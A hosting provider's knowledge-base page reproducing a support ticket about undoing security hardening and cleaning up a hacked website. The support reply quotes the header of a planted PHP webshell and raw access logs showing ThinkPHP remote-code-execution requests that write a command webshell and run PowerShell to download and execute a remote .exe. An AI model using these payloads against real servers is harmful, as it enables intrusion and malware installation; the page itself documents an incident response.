当前位置:西部数码知识库 常见问题 问一下如何取消安全加固啊

问一下如何取消安全加固啊

2023-02-27 分类:常见问题 阅读(126) 西部数码编辑君

问:弄了安全加固,连报错信息都看不了了,问一下如何取消安全加固啊

答:您好,我司核实到站点访问正常,详见附图1 ,且服务器可正常远程 ,详见附图2 ,且核实您的服务器未安装相关安全软件,若您本地做了什么操作,请具体告知我司,以便我司为您核实  ,非常感谢您长期对我司的支持.由此给您带来的不便之处,敬请原谅!谢谢!

问:http://www.yanchengliusha.com/mobile_report/mobile.php?username=&password=123456

我看不到报错信息,没法调试

问:弄了安全加固,连报错信息都看不了了

答:您好,我司核实到站点访问正常,详见附图1 ,且服务器可正常远程 ,详见附图2 ,且核实您的服务器未安装相关安全软件,若您本地做了什么操作,请具体告知我司,以便我司为您核实  ,非常感谢您长期对我司的支持.由此给您带来的不便之处,敬请原谅!谢谢!

问:http://www.yanchengliusha.com/mobile_report/mobile.php?username=&password=123456

我看不到报错信息,没法调试

问:    提示我的系统盘和数据盘有危险

答:您好,

请根据对方提供建议增加安全配置,同时建议您参考https://www.west.cn/faq/list.asp?unid=853 做进一步安全加固,非常感谢您长期对我司的支持!

问:访问网址出现输入验证码,如何取消啊,这无疑是给网站体验加了一道墙啊

问:

域名rcche.com

答:您好,我司测试访问并无验证码现象,现在为您调整了百度云防护防护等级,请三十分钟后测试  ,

非常感谢您长期对我司的支持,谢谢!

问:由于127.0.0.1这个ip长期不用,请帮忙取消,谢谢

答:您好,已经取消,请续费,非常感谢您长期对我司的支持!

问:因为在贵司使用没几天,就被挂马,已经电话沟通,申请给服务器做安全加固

答:您好,处理中,非常感谢您长期对我司的支持!

问:http://www.lbbqygl.com/ 网站又被挂马了  昨天你们加了防护的 什么情况   

答:您好,核实通过护卫神的工具扫描,核实程序是通过漏洞注入方式,把木马注入在runtime这个目录上传了木马文件修改了站点内容,当前请您先清理好病毒及木马文件,然后回复工单,告知哪些目录需要上传文件,然后我司再针对脚本执行及文件权限等进行特殊加固一下,非常感谢您长期对我司的支持!

可访问这个木马http://www.lbbqygl.com/runtime/cache/05/index.php
<?phperror_reporting(E_ERROR);@ini_set(\’display_errors\’,\’Off\’);@ini_set(\’max_execution_time\’,20000);@ini_set(\’memory_limit\’,\’256M\’);header(\”content-Type: text/html; charset=utf-8\”);$password = \”c561ed8f4cf2d3f2e19c4f1c898cfbcb\”; //Vdefine(\’B\’,\’Denzel-你的英雄\’); // 标题

127.0.0.1 – – [03/Apr/2019:11:48:07 0800] \”GET /public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20$action%20=%20$_GET[\’xcmd\’];system($action);?^>>hydra.php HTTP/1.1\” 404 214 \”http://127.0.0.1:80/public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php $action = $_GET[\’xcmd\’];system($action);?^>>hydra.php\” \”Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\”127.0.0.1 – – [03/Apr/2019:12:48:07 0800] \”GET /public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile(\’http://fid.hognoob.se/download.exe\’,\’C:/Windows/temp/tthgerqqvjwjihu22027.exe\’);start%20C:/Windows/temp/tthgerqqvjwjihu22027.exe HTTP/1.1\” 404 214 \”http://127.0.0.1:80/public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile(\’http://fid.hognoob.se/download.exe\’,\’C:/Windows/temp/tthgerqqvjwjihu22027.exe\’);start C:/Windows/temp/tthgerqqvjwjihu22027.exe\” \”Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\”127.0.0.1 – – [03/Apr/2019:12:48:07 0800] \”GET /public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20$action%20=%20$_GET[\’xcmd\’];system($action);?^>>hydra.php HTTP/1.1\” 404 214 \”http://127.0.0.1:80/public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php $action = $_GET[\’xcmd\’];system($action);?^>>hydra.php\” \”Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\”127.0.0.1 – – [03/Apr/2019:14:37:21 0800] \”GET //index.php?s=index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=copy&vars[1][]=http://127.0.0.1:29808/ss.txt&vars[1][]=xin.php HTTP/1.1\” 500 32186 \”-\” \”Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36\”127.0.0.1 – – [03/Apr/2019:14:39:03 0800] \”GET /runtime/cache/05/index.php HTTP/1.1\” 200 845 \”http://www.lbbqygl.com/xin.php\” \”Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36\”127.0.0.1 – – [03/Apr/2019:14:39:11 0800] \”POST /runtime/cache/05/index.php HTTP/1.1\” 200 68152 \”http://www.lbbqygl.com/runtime/cache/05/index.php\” \”Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36\”127.0.0.1 – – [03/Apr/2019:14:39:15 0800] \”POST /runtime/cache/05/index.php HTTP/1.1\” 200 69440 \”http://www.lbbqygl.com/runtime/cache/05/index.php\” \”Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36\”127.0.0.1 – – [03/Apr/2019:14:39:17 0800] \”POST /runtime/cache/05/index.php HTTP/1.1\” 200 68119 \”http://www.lbbqygl.com/runtime/cache/05/index.php\” \”Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36\”127.0.0.1 – – [03/Apr/2019:14:39:18 0800] \”POST /runtime/cache/05/index.php HTTP/1.1\” 200 68479 \”http://www.lbbqygl.com/runtime/cache/05/index.php\” \”Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36\”127.0.0.1 – – [03/Apr/2019:14:39:20 0800] \”POST /runtime/cache/05/index.php HTTP/1.1\” 200 68227 \”http://www.lbbqygl.com/runtime/cache/05/index.php\” \”Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36\”

问:现在我在FTP里删除网站文件都删除不了

问:网站上传好了

问:只弄这个网站  其它几个网站不要设置  www.lbbqygl.com

答:您好,1.已经把各个站点开启了访问日志记录,后期可根据日志记录分析;

          2.已经设置安全加固,请您登录后台上传文件等试试,目前是只允许/home/www/lbbqygl_com/public_html/public/uploads和/home/www/lbbqygl_com/public_html/public/static 允许上传文件,但不可以执行php脚本等,详见.htaccess规则;          3.如要临时修改文件,请登录云锁,关闭对应站点防篡改功能后测试,非常感谢您长期对我司的支持!

更多关于云服务器域名注册虚拟主机的问题,请访问西部数码官网:www.west.cn
赞(0)
声明:本网站发布的内容(图片、视频和文字)以原创、转载和分享网络内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-62778877-8306;邮箱:fanjiao@west.cn。本站原创内容未经允许不得转载,或转载时需注明出处:西部数码知识库 » 问一下如何取消安全加固啊

站内搜索

猜你还会喜欢下面的内容

热门标签

其他问题云服务器问题域名及账户问题企业邮局市场咨询云服务器云建站/云站群/小程序虚拟主机网络知识企业邮箱域名注册域名备案商标注册域名云主机更多标签...

大家感兴趣的内容

登录

找回密码

注册